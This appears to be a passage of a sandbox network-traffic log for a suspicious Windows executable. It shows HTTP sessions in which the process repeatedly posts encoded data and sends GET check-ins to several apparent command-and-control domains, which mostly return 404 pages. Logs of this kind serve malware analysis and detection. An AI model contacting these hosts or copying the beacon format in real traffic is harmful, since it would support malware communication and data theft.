                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Sep 25, 2024 09:16:37.932672977 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                                              Connection: close
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              content-type: text/html
                                                              content-length: 796
                                                              date: Wed, 25 Sep 2024 07:16:37 GMT
                                                              server: LiteSpeed
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              9 | 192.168.2.8 | 49724 | 3.33.130.190 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:16:42.987644911 CEST | 719 | OUT | POST /u85y/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.dhkatp.vip
                                                              Origin: http://www.dhkatp.vip
                                                              Referer: http://www.dhkatp.vip/u85y/
                                                              Content-Length: 208
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Ascii: Ux_TPFo=9Df5fTdg88KIFV6O9eXUawKIEwLX8NVAp0dDObFWIPGad8eCWTf9hqGQtLBRkhWT6TndAtA+7sV475ow+DL2U9Pch9/xCZgC+yWWzuIfuRBhMY5FUOh3yzL9mXpvkoJU19Fc6XuUnRv0BzsWf8V5xwUgSOeFcdvBdryx/i/BucOpe15VglFipPDtLY7wXmM0wpYh+Tk=


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              10 | 192.168.2.8 | 49725 | 3.33.130.190 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:16:45.539611101 CEST | 739 | OUT | POST /u85y/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.dhkatp.vip
                                                              Origin: http://www.dhkatp.vip
                                                              Referer: http://www.dhkatp.vip/u85y/
                                                              Content-Length: 228
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Ascii: Ux_TPFo=9Df5fTdg88KIH1qOu9PUYQKJagLX1tVEp0BDOaBGI9iaEduCXSf9mqGQ1bBU6RWY6SauAtM+7sB479gw+yL1VtPe0t//P5gC+yWWzqoluRZhMrhFTfh0xzL+hXpvgoJQ19Ez6SOynSH0BycWfph46wUmfufmZYDRVKiZ206ng8CcbDU/6HNkqPrGLbTGSRRcqKIRgEzw96/OF0odnFiDpEYuXUNs


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              11 | 192.168.2.8 | 49726 | 3.33.130.190 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:16:48.087086916 CEST | 1756 | OUT | POST /u85y/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.dhkatp.vip
                                                              Origin: http://www.dhkatp.vip
                                                              Referer: http://www.dhkatp.vip/u85y/
                                                              Content-Length: 1244
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Ascii: Ux_TPFo= [TRUNCATED]


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              12 | 192.168.2.8 | 49727 | 3.33.130.190 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:16:50.629978895 CEST | 470 | OUT | GET /u85y/?FvypB=88kTDXb8k4dH&Ux_TPFo=wB3ZcmNh1MmrIwfSzb/pYDfeTUzW6O1UjWNgVadWZuGYS/WrcxHhgLOrzo8qigeYzDjwJvcv1eEC2ecO3wCLRJj3wqTQMKM05jGtzaYfnBJ5M7wMOeAqnxHMoiYb58YbsA== HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Host: www.dhkatp.vip
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Sep 25, 2024 09:16:51.106215954 CEST | 414 | IN | HTTP/1.1 200 OK
                                                              Server: openresty
                                                              Date: Wed, 25 Sep 2024 07:16:51 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 274
                                                              Connection: close
                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?FvypB=88kTDXb8k4dH&Ux_TPFo=wB3ZcmNh1MmrIwfSzb/pYDfeTUzW6O1UjWNgVadWZuGYS/WrcxHhgLOrzo8qigeYzDjwJvcv1eEC2ecO3wCLRJj3wqTQMKM05jGtzaYfnBJ5M7wMOeAqnxHMoiYb58YbsA=="}</script></head></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              13 | 192.168.2.8 | 49728 | 148.251.114.233 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:16:56.236960888 CEST | 749 | OUT | POST /30vc/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.eslameldaramlly.site
                                                              Origin: http://www.eslameldaramlly.site
                                                              Referer: http://www.eslameldaramlly.site/30vc/
                                                              Content-Length: 208
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Ascii: Ux_TPFo=pqjNF5PBwMCUp5etCYo5zpRvfr9RlacUVyyCBZZRCXrtRaB27tdkmJ2+BJPA6BoYW+pTWOxneVw0JR9KU9KzPPf6XTh++14Lw3ndZpJM56dhZnRFU+RL9ZMvmZhSEGTPiZuYZytE1RSWBj03T9EmBXAr9H9Y0jFEBYm2B6pfwqvVVxaAYDHPo+EM8yv8RVRbwrUXmf0=
                                                              Sep 25, 2024 09:16:56.878567934 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                              Connection: close
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              content-type: text/html
                                                              content-length: 1238
                                                              date: Wed, 25 Sep 2024 07:16:56 GMT
                                                              server: LiteSpeed
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
                                                              Sep 25, 2024 09:16:56.878588915 CEST | 240 | IN
                                                              Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              14 | 192.168.2.8 | 49729 | 148.251.114.233 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:16:58.774002075 CEST | 769 | OUT | POST /30vc/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.eslameldaramlly.site
                                                              Origin: http://www.eslameldaramlly.site
                                                              Referer: http://www.eslameldaramlly.site/30vc/
                                                              Content-Length: 228
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Ascii: Ux_TPFo=pqjNF5PBwMCUpYutRpo5iZRwar9Rr6cQVyuCBYMJChbtR7x26opkjJ2+LpPF1hpUW+lhWOdneVU0JQtKVN2wNff0Djh8614Lw3ndZpNm5+xhYXhFVfRMhJMohZhSS2SniZu6Z2Nu1S6WBiE3UpQlKXAtzn8p624LIfqMCcsw/67QQH3qChPJr+sn8xHKUiMzqIEn4IgXS11mPv42RzYkOXKgEQ7I
                                                              Sep 25, 2024 09:16:59.405158997 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                              Connection: close
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              content-type: text/html
                                                              content-length: 1238
                                                              date: Wed, 25 Sep 2024 07:16:59 GMT
                                                              server: LiteSpeed
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
                                                              Sep 25, 2024 09:16:59.405184984 CEST | 240 | IN
                                                              Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              15 | 192.168.2.8 | 49730 | 148.251.114.233 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:17:01.332737923 CEST | 1786 | OUT | POST /30vc/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.eslameldaramlly.site
                                                              Origin: http://www.eslameldaramlly.site
                                                              Referer: http://www.eslameldaramlly.site/30vc/
                                                              Content-Length: 1244
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Ascii: Ux_TPFo= [TRUNCATED]
                                                              Sep 25, 2024 09:17:01.988332987 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                              Connection: close
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              content-type: text/html
                                                              content-length: 1238
                                                              date: Wed, 25 Sep 2024 07:17:01 GMT
                                                              server: LiteSpeed
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
                                                              Sep 25, 2024 09:17:01.988351107 CEST | 240 | IN
                                                              Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              16 | 192.168.2.8 | 49731 | 148.251.114.233 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:17:03.881491899 CEST | 480 | OUT | GET /30vc/?Ux_TPFo=koLtGNOu6/mtotP2N90Ew8ZnZ5AtrYolTy+nHYpgZByzVo0p/pJDl5mHD5S71z13e/5SfuBUTFBQZBIfTtXqOOjASHRAzkUFzB/tE7NVhPpefWhKcPM/9ZcforBBDyLF2Q==&FvypB=88kTDXb8k4dH HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Host: www.eslameldaramlly.site
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Sep 25, 2024 09:17:04.515032053 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                              Connection: close
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              content-type: text/html
                                                              content-length: 1238
                                                              date: Wed, 25 Sep 2024 07:17:04 GMT
                                                              server: LiteSpeed
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
                                                              Sep 25, 2024 09:17:04.515047073 CEST | 240 | IN
                                                              Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              17 | 192.168.2.8 | 49732 | 209.74.95.29 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:17:09.704190969 CEST | 719 | OUT | POST /gfz9/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.pofgof.pro
                                                              Origin: http://www.pofgof.pro
                                                              Referer: http://www.pofgof.pro/gfz9/
                                                              Content-Length: 208
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Ascii: Ux_TPFo=OGqlMbYLd8PJmv4olE7DVbaBFckLTkFtNnT24+Oy7+Ujv8wa1GD3Lh5bW4PsCuqhqBmqanN7JJn5ZKzixm6QHE2aiQsCvh7o/fNcG7JCEfzXTKXhvC7bIhE1LgPRvDadA8VeXyGEGF40LLgcGvHz93QEUBvel3Nszqx1YcWubFfM6J9L4sHLjkY0l+p2TR3oNd9lrpY=
                                                              Sep 25, 2024 09:17:10.284580946 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                              Date: Wed, 25 Sep 2024 07:17:10 GMT
                                                              Server: Apache
                                                              X-Frame-Options: SAMEORIGIN
                                                              Content-Length: 13928
                                                              X-XSS-Protection: 1; mode=block
                                                              Connection: close
                                                              Content-Type: text/html
                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Makaan - Real Estate HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Inter:wght@700;800&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" [TRUNCATED]
                                                              Sep 25, 2024 09:17:10.284598112 CEST | 1236 | IN
                                                              Data Ascii: > <link href="lib/owlcarousel/assets/owl.carousel.min.css" rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template Stylesheet --> <link href="cs
                                                              Sep 25, 2024 09:17:10.284610033 CEST448INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 6d 2d 30 20 74 65 78 74 2d 70 72 69 6d 61 72 79 22 3e 4d 61 6b 61 61 6e 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0d 0a 20
                                                              Data Ascii: <h1 class="m-0 text-primary">Makaan</h1> </a> <button type="button" class="navbar-toggler" data-bs-toggle="collapse" data-bs-target="#navbarCollapse"> <span class="navbar-
                                                              Sep 25, 2024 09:17:10.284784079 CEST1236INData Raw: 61 20 68 72 65 66 3d 22 69 6e 64 65 78 2e 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 6e 61 76 2d 6c 69 6e 6b 22 3e 48 6f 6d 65 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61
                                                              Data Ascii: a href="index.html" class="nav-item nav-link">Home</a> <a href="about.html" class="nav-item nav-link">About</a> <div class="nav-item dropdown"> <a href="#" class="n
                                                              Sep 25, 2024 09:17:10.284795046 CEST224INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 63 6f 6e 74 61 63 74 2e 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 6e 61 76
                                                              Data Ascii: </div> <a href="contact.html" class="nav-item nav-link">Contact</a> </div> <a href="" class="btn btn-primary px-3 d-none d-lg-flex">Add Prop
                                                              Sep 25, 2024 09:17:10.284805059 CEST1236INData Raw: 65 72 74 79 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6e 61 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d
                                                              Data Ascii: erty</a> </div> </nav> </div> ... Navbar End --> ... Header Start --> <div class="container-fluid header bg-white p-0"> <div class="row g-0 align-items-center
                                                              Sep 25, 2024 09:17:10.284816027 CEST224INData Raw: 3d 22 30 2e 31 73 22 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 3a 20 33 35 70 78 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                              Data Ascii: ="0.1s" style="padding: 35px;"> <div class="container"> <div class="row g-2"> <div class="col-md-10"> <div class="row g-2">
                                                              Sep 25, 2024 09:17:10.285383940 CEST1236INData Raw: 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 34 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 63 6c
                                                              Data Ascii: <div class="col-md-4"> <input type="text" class="form-control border-0 py-3" placeholder="Search Keyword"> </div> <div class="col-md-4">
                                                              Sep 25, 2024 09:17:10.285393953 CEST224INData Raw: 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 32 22 3e 0d 0a 20 20 20 20
                                                              Data Ascii: div> </div> <div class="col-md-2"> <button class="btn btn-dark border-0 w-100 py-3">Search</button> </div> </div>
                                                              Sep 25, 2024 09:17:10.285406113 CEST1236INData Raw: 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 53 65 61 72 63 68 20 45 6e 64 20 2d 2d 3e 0d 0a 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 34 30 34 20
                                                              Data Ascii: </div> </div> ... Search End --> ... 404 Start --> <div class="container-xxl py-5 wow fadeInUp" data-wow-delay="0.1s"> <div class="container text-center"> <div cla
                                                              Sep 25, 2024 09:17:10.289688110 CEST1236INData Raw: 65 20 6d 62 2d 34 22 3e 47 65 74 20 49 6e 20 54 6f 75 63 68 3c 2f 68 35 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6d 62 2d 32 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61
                                                              Data Ascii: e mb-4">Get In Touch</h5> <p class="mb-2"><i class="fa fa-map-marker-alt me-3"></i>123 Street, New York, USA</p> <p class="mb-2"><i class="fa fa-phone-alt me-3"></i>+012 345 67890</p>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              18 | 192.168.2.8 | 49733 | 209.74.95.29 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:17:12.245866060 CEST | 739 | OUT | POST /gfz9/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.pofgof.pro
                                                              Origin: http://www.pofgof.pro
                                                              Referer: http://www.pofgof.pro/gfz9/
                                                              Content-Length: 228
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Ascii: Ux_TPFo=OGqlMbYLd8PJnPIopF7DZraGbskLZEFpNnf248jp7Mwjucga0HD3Ih5bYYOkd+quqBjVait7JNP5ZPXiyX6TFU2YvwsThB7o/fNcG7N4EbfXU6Lhsj7YBBE2bAPRrDanA8V8XzbRGHA0LKQcF6r0kHQKQBvMj2cT+bkaVdTJcXP+yfQhiOPNgkwfl9BAWmqAX+tV1+PcY2WSeHkWzvqSGZ6Yw/qK
                                                              Sep 25, 2024 09:17:12.820014954 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                              Date: Wed, 25 Sep 2024 07:17:12 GMT
                                                              Server: Apache
                                                              X-Frame-Options: SAMEORIGIN
                                                              Content-Length: 13928
                                                              X-XSS-Protection: 1; mode=block
                                                              Connection: close
                                                              Content-Type: text/html


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              19 | 192.168.2.8 | 49734 | 209.74.95.29 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:17:14.789195061 CEST | 1756 | OUT | POST /gfz9/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.pofgof.pro
                                                              Origin: http://www.pofgof.pro
                                                              Referer: http://www.pofgof.pro/gfz9/
